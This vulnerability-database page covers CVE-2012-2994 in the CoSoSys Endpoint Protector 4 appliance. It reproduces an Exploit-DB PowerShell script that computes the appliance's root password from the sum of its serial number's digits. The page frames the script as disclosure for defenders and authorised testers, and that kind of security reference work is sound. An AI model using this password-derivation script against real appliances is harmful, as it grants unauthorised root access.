VIR Vulnerability Intelligence Relay

CVE-2012-2994

high
Published 2012-09-18 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
8.5

Description

The CoSoSys Endpoint Protector 4 appliance establishes an EPProot password based entirely on the appliance serial number, which makes it easier for remote attackers to obtain access via a brute-force attack.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-37803 remote hardware verified text ยท 2 KB
Christopher Campbell ยท 2012-09-17

CoSoSys Endpoint Protector - Predictable Password Generation

text exploit Source: Exploit-DB 
source: https://www.securityfocus.com/bid/55570/info

CoSoSys Endpoint Protector is prone to an insecure password generation vulnerability.

Successfully exploiting this issue may allow an attacker to guess generated passwords and gain access to affected appliances.

CoSoSys Endpoint Protector 4 is vulnerable; other versions may also be affected. 

function Get-EPPPassword {
<#
.Synopsis

 Get-EPPPassword calculates the predictable root password for Cososys Endpoint Protector 4 servers.
 Author: Chris Campbell (@obscuresec)
 License: BSD 3-Clause
 
.Description

 Get-EPPPassword Timeline: 
  discovered            3 Mar 2012
  reported to vendor   12 Jun 2012
  reported to US-CERT  15 Jul 2012
  released             17 Sep 2012
    
.Example

 Get-EPPPassword -Serial 123456789

.Link

 http://obscuresecurity.blogspot.com/2012/09/cososys-predicable-password-cve-2012.html
#>

Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Serial)

#function to calculate sums from serial number 
function GetSerialSum {
 if ($Serial.Length -ne 9) {
        Return "EPP Serial Number is 9 digits"
    } 
    else {
 #convert $serial to an array of integers 
  [int[]] $SerialArray = [char[]]$Serial| ForEach-Object {[int]"$_"}
   }
 foreach ($Number in $SerialArray) {
            $Sum += $Number
            }
 Write-Output $Sum
}

#function to calculate epproot password
function GetPassword {
 Write-Output "eroot!00$Sums`RO"
 }
$Sums = GetSerialSum
GetPassword
}

Get-EPPPassword -Serial 135792468

References

CWEs

CWE-264

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.